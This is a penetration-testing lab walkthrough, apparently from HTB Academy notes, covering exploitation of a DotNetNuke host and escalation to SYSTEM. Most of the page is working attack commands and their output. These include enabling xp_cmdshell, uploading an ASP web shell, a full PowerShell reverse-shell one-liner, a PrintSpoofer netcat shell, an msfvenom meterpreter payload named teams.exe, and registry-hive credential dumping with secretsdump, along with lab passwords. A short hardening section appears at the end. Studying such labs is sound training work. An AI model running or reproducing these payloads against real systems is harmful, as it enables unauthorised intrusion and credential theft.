⚔️Exploitation & Privilege Escalation

🎯 Overview

Exploitation & Privilege Escalation transforms credential discovery into SYSTEM-level access on internal hosts. Leverage DotNetNuke (DNN) administrative access, enable xp_cmdshell, exploit SeImpersonate privileges with PrintSpoofer, and establish multiple persistence methods for reliable internal network control.

🌐 DotNetNuke (DNN) Exploitation

🔐 Administrative Access

# Credential validation from NFS discovery
Administrator:D0tn31Nuk3R0ck$$@123
# Source: /DEV01/DNN/web.config

# Login verification
http://172.16.8.20/Login?returnurl=%2fadmin
# Result: SuperUser administrator account access

# Findings to document:
1. Insecure File Shares (NFS anonymous access)
2. Sensitive Data on File Shares (credentials in config)

🛠️ SQL Console Exploitation

-- Enable xp_cmdshell for command execution
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

-- Test command execution
xp_cmdshell 'whoami'
-- Output: nt service\mssql$sqlexpress

📁 File Extension Bypass

# DNN file upload configuration:
1. Settings → Security → More → More Security Settings
2. Allowable File Extensions: asp,aspx,exe,SAVE
3. Save configuration

# Upload capabilities enabled:
- ASP web shells (.asp, .aspx)
- Executable files (.exe)
- Registry dumps (.SAVE)

🔺 Privilege Escalation Techniques

🖥️ Web Shell Deployment

# ASP web shell upload
1. Download newcmdasp.asp from GitHub
2. Upload via DNN File Management (/admin/file-management)
3. Access web shell via uploaded file URL
4. Test command execution: whoami

# Result: iis apppool\dotnetnukeapppool
# Privileges: SeImpersonate (exploitable)

🚀 PowerShell Reverse Shell

# Reverse shell payload (from web shell):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('172.16.8.120',9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# Listener setup (on dmz01):
nc -nvlp 9999
# Result: Interactive PowerShell session

🎯 PrintSpoofer Exploitation

# Prerequisites:
1. Upload nc.exe and PrintSpoofer64.exe via DNN
2. Verify SeImpersonate privilege
3. Setup listener on dmz01

# PrintSpoofer execution:
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 172.16.8.120 443 -e cmd"

# Expected privileges:
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

# Result: NT AUTHORITY\SYSTEM shell

💾 Credential Harvesting

🔐 SAM Database Extraction

# Registry hive dumping (as SYSTEM):
reg save HKLM\SYSTEM SYSTEM.SAVE
reg save HKLM\SECURITY SECURITY.SAVE
reg save HKLM\SAM SAM.SAVE

# Download via DNN file manager:
1. Navigate to /admin/file-management
2. Download SYSTEM.SAVE, SECURITY.SAVE, SAM.SAVE
3. Transfer to attack host for analysis

🔍 Secretsdump Analysis

# Credential extraction
secretsdump.py LOCAL -system SYSTEM.SAVE -sam SAM.SAVE -security SECURITY.SAVE

# Local account hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[NT_HASH]
mpalledorous:1001:aad3b435b51404eeaad3b435b51404ee:[NT_HASH]

# Domain cached credentials:
INLANEFREIGHT.LOCAL/hporter:$DCC2$10240#hporter#[HASH]

# LSA Secrets:
DefaultPassword: Gr8hambino!
# Associated user: hporter (domain account)

🎯 Domain Credentials Discovery

# First domain credential pair discovered:
hporter:Gr8hambino!
# Source: LSA Secrets DefaultPassword

# Validation from SYSTEM shell:
net user hporter /dom
# Output: Domain Users group membership confirmed
# Password last set: 6/1/2022
# Account active: Yes

🔄 Alternative Attack Methods

🔀 Reverse Port Forwarding

# Scenario: Direct reverse shell from DEV01 to attack host

# 1. Generate payload (target: dmz01 IP)
msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.8.120 -f exe -o teams.exe LPORT=443

# 2. Setup multi/handler (attack host)
use multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 7000
run

# 3. SSH reverse port forwarding
ssh -i dmz01_key -R 172.16.8.120:443:0.0.0.0:7000 root@TARGET_IP -vN

# 4. Execute payload on DEV01
teams.exe
# Result: Meterpreter session through port forwarding

⚙️ SSH Configuration Requirements

# GatewayPorts configuration (if needed):
# Edit /etc/ssh/sshd_config on dmz01:
GatewayPorts yes  # Change from 'no' to 'yes'

# Reload SSH service:
service sshd reload

# Security consideration:
- Client approval required for config changes
- Document all modifications
- Revert changes post-assessment
- Note security implications in report

🎯 Multiple Access Vectors

🔄 Attack Path Diversity

# Method 1: SQL Console → xp_cmdshell
DNN Admin → Settings → SQL Console → Command execution

# Method 2: File Upload → ASP Web Shell
DNN Admin → File Extensions → Upload newcmdasp.asp → RCE

# Method 3: Direct Credential Usage
hporter:Gr8hambino! → SMB/RDP/WinRM access

# Method 4: Pass-the-Hash
Administrator NT hash → Direct authentication

🛡️ Persistence Mechanisms

# Local administrator access:
- SAM database hash extraction
- Pass-the-hash authentication capability
- Local admin account compromise

# Domain account access:
- hporter:Gr8hambino! (cleartext)
- Domain Users group membership
- Internal AD enumeration capability

# System-level access:
- NT AUTHORITY\SYSTEM shell
- Registry access and modification
- Service manipulation capabilities

🎯 Active Directory Preparation

🔍 Domain Intelligence Gathered

# Domain information:
Domain: INLANEFREIGHT.LOCAL
Domain Controller: 172.16.8.3
Domain SID: S-1-5-21-2814148634-3729814499-1637837074

# Compromised accounts:
hporter (Domain Users) - cleartext password
Administrator (DEV01 local) - NT hash
mpalledorous (DEV01 local) - NT hash

# Network positioning:
- SYSTEM access on DEV01 (172.16.8.20)
- Root access on dmz01 (172.16.8.120)
- Direct connectivity to Domain Controller

📋 Next Phase Planning

# AD enumeration priorities:
1. BloodHound data collection
2. Domain user enumeration
3. Service account discovery
4. Group membership analysis
5. Trust relationship mapping

# Lateral movement opportunities:
- Kerberoasting attacks
- ASREPRoasting attempts
- Password spraying campaigns
- SMB share enumeration
- Privilege escalation hunting

🎯 HTB Academy Labs

📋 Lab Solution Summary

# Lab 1: SAM Database Extraction
1. DNN admin access → Administrator:D0tn31Nuk3R0ck$$@123
2. File extension modification → asp,aspx,exe,SAVE
3. Web shell upload → newcmdasp.asp deployment
4. PrintSpoofer exploitation → SYSTEM privilege escalation
5. Registry hive dumping → SAM, SYSTEM, SECURITY
6. Secretsdump analysis → Administrator NT hash extraction

# Lab 2: Administrator Desktop Flag
1. SYSTEM shell establishment → PrintSpoofer execution
2. Privilege verification → NT AUTHORITY\SYSTEM
3. Flag retrieval → C:\Users\Administrator\Desktop\flag.txt

🔍 Key Learning Points

# Technical skills:
- DNN administrative functionality abuse
- SQL Server xp_cmdshell exploitation
- SeImpersonate privilege escalation
- Windows registry credential extraction

# Professional methodology:
- Multiple attack vector development
- Persistence mechanism establishment
- Evidence collection standards
- Systematic privilege escalation

# Real-world scenarios:
- Development environment exploitation
- Configuration file credential mining
- Built-in functionality abuse
- Domain preparation techniques

🛡️ Defensive Recommendations

🔒 Application Security

# DNN hardening:
- Disable SQL Console access
- Restrict file upload extensions
- Implement admin approval workflows
- Regular credential rotation

# SQL Server security:
- Disable xp_cmdshell by default
- Implement least privilege access
- Monitor database admin activities
- Use dedicated service accounts

# File share security:
- Disable anonymous NFS access
- Implement proper access controls
- Encrypt sensitive configuration files
- Regular share permission audits

PreviousInternal Information Gathering NextLateral Movement

Last updated 4 months ago

hashtag🎯 Overview

hashtag🌐 DotNetNuke (DNN) Exploitation

hashtag🔐 Administrative Access

hashtag🛠️ SQL Console Exploitation

hashtag📁 File Extension Bypass

hashtag🔺 Privilege Escalation Techniques

hashtag🖥️ Web Shell Deployment

hashtag🚀 PowerShell Reverse Shell

hashtag🎯 PrintSpoofer Exploitation

hashtag💾 Credential Harvesting

hashtag🔐 SAM Database Extraction

hashtag🔍 Secretsdump Analysis

hashtag🎯 Domain Credentials Discovery

hashtag🔄 Alternative Attack Methods

hashtag🔀 Reverse Port Forwarding

hashtag⚙️ SSH Configuration Requirements

hashtag🎯 Multiple Access Vectors

hashtag🔄 Attack Path Diversity

hashtag🛡️ Persistence Mechanisms

hashtag🎯 Active Directory Preparation

hashtag🔍 Domain Intelligence Gathered

hashtag📋 Next Phase Planning

hashtag🎯 HTB Academy Labs

hashtag📋 Lab Solution Summary

hashtag🔍 Key Learning Points

hashtag🛡️ Defensive Recommendations

hashtag🔒 Application Security